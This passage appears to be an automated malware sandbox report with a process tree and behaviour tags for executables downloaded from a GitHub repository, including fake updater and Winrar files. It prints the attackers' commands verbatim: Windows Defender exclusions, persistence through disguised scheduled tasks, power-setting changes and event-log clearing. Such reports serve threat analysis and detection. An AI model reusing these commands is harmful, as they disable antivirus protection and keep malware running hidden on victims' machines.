wrote to memory of 452 4416 chrome.exe 80 PID 4416 wrote to memory of 452 4416 chrome.exe 80 PID 4416 wrote to memory of 452 4416 chrome.exe 80 PID 4416 wrote to memory of 452 4416 chrome.exe 80 PID 4416 wrote to memory of 452 4416 chrome.exe 80 PID 4416 wrote to memory of 452 4416 chrome.exe 80 PID 4416 wrote to memory of 452 4416 chrome.exe 80 PID 4416 wrote to memory of 452 4416 chrome.exe 80 PID 4416 wrote to memory of 452 4416 chrome.exe 80 PID 4416 wrote to memory of 5236 4416 chrome.exe 82 PID 4416 wrote to memory of 5236 4416 chrome.exe 82 PID 4416 wrote to memory of 5236 4416 chrome.exe 82 PID 4416 wrote to memory of 5236 4416 chrome.exe 82 PID 4416 wrote to memory of 5236 4416 chrome.exe 82 PID 4416 wrote to memory of 5236 4416 chrome.exe 82 PID 4416 wrote to memory of 5236 4416 chrome.exe 82 PID 4416 wrote to memory of 5236 4416 chrome.exe 82 PID 4416 wrote to memory of 5236 4416 chrome.exe 82 PID 4416 wrote to memory of 5236 4416 chrome.exe 82 PID 4416 wrote to memory of 5236 4416 chrome.exe 82 PID 4416 wrote to memory of 5236 4416 chrome.exe 82 PID 4416 wrote to memory of 5236 4416 chrome.exe 82 PID 4416 wrote to memory of 5236 4416 chrome.exe 82 PID 4416 wrote to memory of 5236 4416 chrome.exe 82 PID 4416 wrote to memory of 5236 4416 chrome.exe 82 PID 4416 wrote to memory of 5236 4416 chrome.exe 82 PID 4416 wrote to memory of 5236 4416 chrome.exe 82 PID 4416 wrote to memory of 5236 4416 chrome.exe 82 PID 4416 wrote to memory of 5236 4416 chrome.exe 82 PID 4416 wrote to memory of 5236 4416 chrome.exe 82 PID 4416 wrote to memory of 5236 4416 chrome.exe 82 PID 4416 wrote to memory of 5236 4416 chrome.exe 82 PID 4416 wrote to memory of 5236 4416 chrome.exe 82 PID 4416 wrote to memory of 5236 4416 chrome.exe 82 PID 4416 wrote to memory of 5236 4416 chrome.exe 82 PID 4416 wrote to memory of 5236 4416 chrome.exe 82 PID 4416 wrote to memory of 5236 4416 chrome.exe 82 PID 4416 wrote to memory of 5236 4416 chrome.exe 82 PID 4416 wrote to memory of 5236 4416 chrome.exe 82 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:632
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:420
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:684
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:984
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:456
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1040
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:1048
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1056
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1184
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1236 -
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:3300
-
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
PID:4228
-
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵PID:1380
-
-
C:\Users\Admin\AppData\Roaming\taskhostw.exeC:\Users\Admin\AppData\Roaming\taskhostw.exe2⤵PID:1200
-
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵PID:3056
-
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵PID:2728
-
-
C:\Users\Admin\AppData\Roaming\taskhostw.exeC:\Users\Admin\AppData\Roaming\taskhostw.exe2⤵PID:6108
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netprofm -p -s netprofm1⤵PID:1272
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1308
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1356
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Indicator Removal: Clear Windows Event Logs
PID:1400
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1480
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2980
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1524
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1552
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵PID:1700
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1712
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1768
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1840
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1884
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:2024
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:2036
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:2060
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:2072
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2168
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2256
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2368
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2512
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2520
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵PID:2556
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2616
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2636
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:2648
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2696
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2756
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:3024
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:2604
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3280
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://github.com/DexterG0/XC/2⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4416 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe8ee2dcf8,0x7ffe8ee2dd04,0x7ffe8ee2dd103⤵PID:3412
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1432,i,3577822700543429496,1933318279859611810,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=2100 /prefetch:113⤵
- Downloads MZ/PE file
PID:5052
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1960,i,3577822700543429496,1933318279859611810,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=1956 /prefetch:23⤵PID:452
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2336,i,3577822700543429496,1933318279859611810,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=2348 /prefetch:133⤵PID:5236
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3164,i,3577822700543429496,1933318279859611810,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=3220 /prefetch:13⤵PID:4764
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3172,i,3577822700543429496,1933318279859611810,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=3232 /prefetch:13⤵PID:4772
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3792,i,3577822700543429496,1933318279859611810,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=4308 /prefetch:93⤵PID:4988
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4648,i,3577822700543429496,1933318279859611810,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=5128 /prefetch:143⤵PID:6012
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5404,i,3577822700543429496,1933318279859611810,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=5684 /prefetch:143⤵PID:5860
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5416,i,3577822700543429496,1933318279859611810,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=212 /prefetch:143⤵PID:1476
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5480,i,3577822700543429496,1933318279859611810,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=5740 /prefetch:143⤵PID:5760
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4296,i,3577822700543429496,1933318279859611810,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=4300 /prefetch:143⤵
- Subvert Trust Controls: Mark-of-the-Web Bypass
- NTFS ADS
PID:4224
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4316,i,3577822700543429496,1933318279859611810,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=4332 /prefetch:143⤵
- Subvert Trust Controls: Mark-of-the-Web Bypass
- NTFS ADS
PID:4108
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5712,i,3577822700543429496,1933318279859611810,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=5708 /prefetch:143⤵
- Subvert Trust Controls: Mark-of-the-Web Bypass
- NTFS ADS
PID:1516
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5476,i,3577822700543429496,1933318279859611810,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=4328 /prefetch:143⤵
- Subvert Trust Controls: Mark-of-the-Web Bypass
- NTFS ADS
PID:1148
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5160,i,3577822700543429496,1933318279859611810,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=5148 /prefetch:143⤵
- Subvert Trust Controls: Mark-of-the-Web Bypass
- NTFS ADS
PID:5400
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4400,i,3577822700543429496,1933318279859611810,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=4304 /prefetch:143⤵
- Subvert Trust Controls: Mark-of-the-Web Bypass
- NTFS ADS
PID:5504
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4332,i,3577822700543429496,1933318279859611810,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=5148 /prefetch:143⤵
- Subvert Trust Controls: Mark-of-the-Web Bypass
- NTFS ADS
PID:5336
-
-
C:\Users\Admin\Downloads\testo.exe"C:\Users\Admin\Downloads\testo.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
PID:2180
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=4376,i,3577822700543429496,1933318279859611810,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=5596 /prefetch:103⤵PID:4292
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=on_device_model.mojom.OnDeviceModelService --lang=en-US --service-sandbox-type=on_device_model_execution --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4488,i,3577822700543429496,1933318279859611810,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=6248 /prefetch:143⤵PID:5512
-
-
-
C:\Users\Admin\Downloads\new.exe"C:\Users\Admin\Downloads\new.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:6140
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1744
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Power Settings
PID:4604 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Power Settings
PID:3036
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Power Settings
PID:1108
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Power Settings
PID:572
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Power Settings
PID:3988
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lkvsnqv#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4724
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"2⤵PID:1244
-
-
C:\Users\Admin\Downloads\testo.exe"C:\Users\Admin\Downloads\testo.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:700
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1444
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:796
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Power Settings
PID:460 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Power Settings
PID:2208
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Power Settings
PID:2272
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Power Settings
PID:2840
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Power Settings
PID:4928
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#kehcpg#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5140
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Power Settings
PID:4648 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Power Settings
PID:4036
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Power Settings
PID:4564
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Power Settings
PID:788
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Power Settings
PID:3640
-
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"2⤵PID:1932
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lkvsnqv#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:980
-
-
C:\Users\Admin\Downloads\Winrar.exe"C:\Users\Admin\Downloads\Winrar.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2148 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Winrar" /tr '"C:\Users\Admin\AppData\Local\Temp\Winrar.exe"' & exit3⤵
- System Location Discovery: System Language Discovery
PID:2012 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Winrar" /tr '"C:\Users\Admin\AppData\Local\Temp\Winrar.exe"'4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1324
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpC2FD.tmp.bat""3⤵
- System Location Discovery: System Language Discovery
PID:2764 -
C:\Windows\SysWOW64\timeout.exetimeout 34⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:4636
-
-
C:\Users\Admin\AppData\Local\Temp\Winrar.exe"C:\Users\Admin\AppData\Local\Temp\Winrar.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2080
-
-
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵PID:5312
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵
- Suspicious behavior: EnumeratesProcesses
PID:5316
-
-
C:\Users\Admin\Downloads\Update.exe"C:\Users\Admin\Downloads\Update.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:5496 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Update.exe'3⤵
- Command and Scripting Interpreter: PowerShell
PID:4576
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Update.exe'3⤵
- Command and Scripting Interpreter: PowerShell
PID:6000
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\taskhostw.exe'3⤵
- Command and Scripting Interpreter: PowerShell
PID:2192
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'taskhostw.exe'3⤵
- Command and Scripting Interpreter: PowerShell
PID:5300
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "taskhostw" /tr "C:\Users\Admin\AppData\Roaming\taskhostw.exe"3⤵
- Scheduled Task/Job: Scheduled Task
PID:3508
-
-
-
C:\Users\Admin\Downloads\SecurityHealth.exe"C:\Users\Admin\Downloads\SecurityHealth.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- NTFS ADS
PID:5336 -
C:\Users\Admin\AppData\Local\Temp\XenoManager\SecurityHealth.exe"C:\Users\Admin\AppData\Local\Temp\XenoManager\SecurityHealth.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4828 -
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /Create /TN "SecurityHealth" /XML "C:\Users\Admin\AppData\Local\Temp\tmpDEE2.tmp" /F4⤵
